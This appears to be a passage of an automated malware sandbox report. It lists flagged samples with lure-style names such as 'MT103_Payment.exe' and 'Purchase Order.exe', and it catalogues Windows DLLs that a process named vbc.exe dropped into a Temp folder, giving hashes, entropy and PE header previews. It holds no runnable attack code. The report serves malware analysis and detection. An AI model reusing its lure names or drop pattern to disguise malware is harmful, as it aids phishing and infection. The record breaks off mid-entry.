                                                                                                  • Filename: MT103_Payment.exe, Detection: malicious, Browse
                                                                                                  • Filename: AYXn09n9uH.exe, Detection: malicious, Browse
                                                                                                  • Filename: fATnlYABZv.exe, Detection: malicious, Browse
                                                                                                  • Filename: pre-alert KFL031321141885.jar, Detection: malicious, Browse
                                                                                                  • Filename: Remittance Detail Report.jar.jar, Detection: malicious, Browse
                                                                                                  • Filename: I-PK-6672955726-D027834252022011003150.exe, Detection: malicious, Browse
                                                                                                  • Filename: I-PK-6672955726-D027834252022011003150.exe, Detection: malicious, Browse
                                                                                                  • Filename: Order.exe, Detection: malicious, Browse
                                                                                                  • Filename: Purchase Order.exe, Detection: malicious, Browse
                                                                                                  • Filename: Proposal.exe, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-datetime-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.093995452106596
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                                                                                                  MD5:CB978304B79EF53962408C611DFB20F5
                                                                                                  SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                                                                                                  SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                                                                                                  SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-debug-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.1028816880814265
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                                                                                                  MD5:88FF191FD8648099592ED28EE6C442A5
                                                                                                  SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                                                                                                  SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                                                                                                  SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.126358371711227
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                                                                                                  MD5:6D778E83F74A4C7FE4C077DC279F6867
                                                                                                  SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                                                                                                  SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                                                                                                  SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-file-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):21816
                                                                                                  Entropy (8bit):7.014255619395433
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                                                                                                  MD5:94AE25C7A5497CA0BE6882A00644CA64
                                                                                                  SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                                                                                                  SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                                                                                                  SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d...................*...g...............*...U...................M...

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-file-l1-2-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.112057846012794
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                                                                                                  MD5:E2F648AE40D234A3892E1455B4DBBE05
                                                                                                  SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                                                                                                  SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                                                                                                  SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-file-l2-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.166618249693435
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                                                                                                  MD5:E479444BDD4AE4577FD32314A68F5D28
                                                                                                  SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                                                                                                  SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                                                                                                  SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..|........8...T...T.......4..|........d...............4..|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-handle-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.1117101479630005
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                                                                                                  MD5:6DB54065B33861967B491DD1C8FD8595
                                                                                                  SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                                                                                                  SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                                                                                                  SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-heap-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.174986589968396
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                                                                                                  MD5:2EA3901D7B50BF6071EC8732371B821C
                                                                                                  SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                                                                                                  SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                                                                                                  SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17856
                                                                                                  Entropy (8bit):7.076803035880586
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                                                                                                  MD5:D97A1CB141C6806F0101A5ED2673A63D
                                                                                                  SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                                                                                                  SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                                                                                                  SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.131154779640255
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                                                                                                  MD5:D0873E21721D04E20B6FFB038ACCF2F1
                                                                                                  SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                                                                                                  SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                                                                                                  SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-localization-l1-2-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20792
                                                                                                  Entropy (8bit):7.089032314841867
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                                                                                                  MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                                                                                                  SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                                                                                                  SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                                                                                                  SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-memory-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.101895292899441
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                                                                                                  MD5:D500D9E24F33933956DF0E26F087FD91
                                                                                                  SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                                                                                                  SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                                                                                                  SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.16337963516533
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                                                                                                  MD5:6F6796D1278670CCE6E2D85199623E27
                                                                                                  SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                                                                                                  SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                                                                                                  SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19248
                                                                                                  Entropy (8bit):7.073730829887072
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                                                                                                  MD5:5F73A814936C8E7E4A2DFD68876143C8
                                                                                                  SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                                                                                                  SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                                                                                                  SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19392
                                                                                                  Entropy (8bit):7.082421046253008
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                                                                                                  MD5:A2D7D7711F9C0E3E065B2929FF342666
                                                                                                  SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                                                                                                  SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                                                                                                  SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.1156948849491055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                                                                                                  MD5:D0289835D97D103BAD0DD7B9637538A1
                                                                                                  SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                                                                                                  SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                                                                                                  SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-profile-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
